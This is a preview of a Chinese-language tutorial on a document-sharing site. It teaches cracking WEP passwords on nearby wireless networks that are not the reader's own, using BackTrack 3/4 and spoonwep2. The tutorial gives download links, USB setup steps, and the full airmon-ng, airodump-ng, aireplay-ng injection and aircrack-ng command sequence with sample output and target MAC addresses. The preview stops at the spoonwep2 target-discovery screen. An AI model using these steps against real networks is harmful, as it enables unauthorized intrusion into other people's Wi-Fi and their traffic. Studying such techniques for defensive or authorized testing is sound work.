没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
bt4 破解教程
一、准备篇
1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。
2、带无线网卡的电脑一台 (笔记本台式机均可, 只要无线网卡兼容 BT3 ),我用 的是三星 NC10
的上网本。
3、2G 以上优盘一个(我用的是 kingston 8G 的)
4、搜索 下载 BT3 ,约 800 兆。或 BT4 ,约 900 兆。
BT3 下载地址: http://f1.soft-3h0jae9frd1g.chnxp.com.cn/BACKTRACK3final_usb.rar
BT4 下载地址: http://ftp.belnet.be/mirror/backtrack/bt4-beta.iso
注: BT3 全称 BackTrack3 ,与我们常说的 bt 下载是完全不同的概念。以我理解就是集成了一
些计算机安全软件的 linux 系统。正是由于它的出世和不断普 及,使得破解可让普通用户轻易
言之。
5、搜索下载 spoonwep2 中文包。地址:
http://gd.qiannao.com:8080/servlet/FileDownload?filename=//yinghu/ 上 传分享 /2008/11/13/ 中
文包 _spoonwep2.rar&vid=0
注:spoonwep2 就是我们的破 解软件, 一个非常强悍的图形化破解 WEP 无线网络密码的工具。
二、安装篇
1、将优盘格式化,配置如下图,唯一要注意文件系统选为 FAT32 就可以了。
2、将刚才下载完成的 bt3 解压缩,复制到优盘,完成后会看到优盘目录下有两个文件夹,一个
boot 一个 BT3 。如下图:
3、开始安装 bt3 系统。
点击开始 -运行,输入 CMD, 然后回车,进入命令行模式 。
首先输入你优盘的盘符,我这里是 h 盘,输入 h: 然后回车,接下来输入 cd boot 回车,进入
到 boot 文件夹下,最后 bootinst.bat 回车,就会开始安装 BT3 ,如下图:
然后安装会出现一个提示画面,我们别去管它,直接按任意键继续
按任意键后,电脑会自动设置引导记录,整个过程大概 10 秒左右。出现下面画面 后,此优盘
就可以引导系统进去 bt3 了。
4、集成 spoonwep2 软件。
首先把我们先前下载的 spoonwep2 解压缩,里面是六个扩展名为 lzm 的文件,将这六个文件复
制 到优盘 \bt3\modules 文件夹下,如图:
这样我们的 bt3 系统已经集成安装完毕了,可以动手破解了。
三 破解篇
1、将安装好系统的优盘插入电脑,重启后进入 bios ,设置优盘为电脑第一启动顺序。(这个如
果没设置过, 可以问一下其他人, 或者在网上找找设置方法, 每 台电脑进入 bios 的方法也不同,
如开机按 F2 ,Del ,F1 等等)
2、设置优盘启动后,电脑会自动带入我们进入 bt3 操作系 统(如果出现界面选择,你要选择
vesa mode ),系统界面是这样的(漂亮吧):
开始输入指令
ifconfig -a 查看网卡(之后只出现 eth0 和 lo 则表示你的无线网卡没有被识别,要是有 eth0 、
wlan 、lo 等则表示可以)
如果出现 wlan 网卡(本机无线网卡),则进行
ifconfig -a wlan0 up (此命令用于加载网卡, 有的时候直接执行 spoonwep 是不可以的,需要
加载)
然后执行 ln -fs bash/bin/sh
再执行 ls -all /bin/sh (显示 bash 为成功,显示 dash 为失败)
现在开始破解
1.在 shell 窗口中输入 ifconfig 命令 ,出现如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode: (...... )Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level= -95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2.找出你的无线网卡名字 ,我这里是 eth1. 再启动你的网卡为 Moniter 模式 (输入 airmon-ng start
eth1 11) 。再输入 ifconfig 命令 ,返回如下信息:
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level= -95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的 11 表示要破解的频道号, bssid 后面的数字表示破解目标的 MAC 物理地址, outputs
表示要生成的包的名称。回车运行。
4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h
00:A1:C1:D8:A5:B6 eth1
其中 “targetnet ”表示破解目标网络名 ,00:1A:01:8D:C3:B2 前面已解释过是指目标 MAC 物理地
址, 00:A1:C1:D8:A5:B6 表示本机网卡 MAC 物理地址
5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
获取更多的数据包。
6.返回数据量到 1 万的时候就可以破解了 。再开一个 shell 输入 aircrack-ng -z -b
00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解。
3、启动 spoonwep2 软件
开启一个命令窗口,输入: spoonwep 回车后 10 秒钟左右弹出 spoonwep2 程序:
NET CARD 网卡接口 选择 WLAN0
DRIVER 驱动 选择 NORMAL
MODE 模式 选择 UNKNOWN VICTIM
点 NEXT 转到 VICTIMS DISCOVERY 窗口
剩余18页未读,继续阅读
资源评论
屈子1
- 粉丝: 18
- 资源: 7万+
下载权益
C知道特权
VIP文章
课程特权
开通VIP
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- mmexport1731025953198.mp4
- 案例数据:标准木数据.sav
- 技术资料分享nRF24L01中文说明书很好的技术资料.zip
- 技术资料分享NRF24l01模块说明书很好的技术资料.zip
- 技术资料分享NRF24L01功能使用文档很好的技术资料.zip
- mbedtls-3.5.2的VS2015编译库
- 技术资料分享nRF24L01P(新版无线模块控制IC)很好的技术资料.zip
- 技术资料分享Nintendo Entertainment System Documentation Version 1.0
- 技术资料分享NES Specifications很好的技术资料.zip
- 技术资料分享MultiMediaCard Product Manual很好的技术资料.zip
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功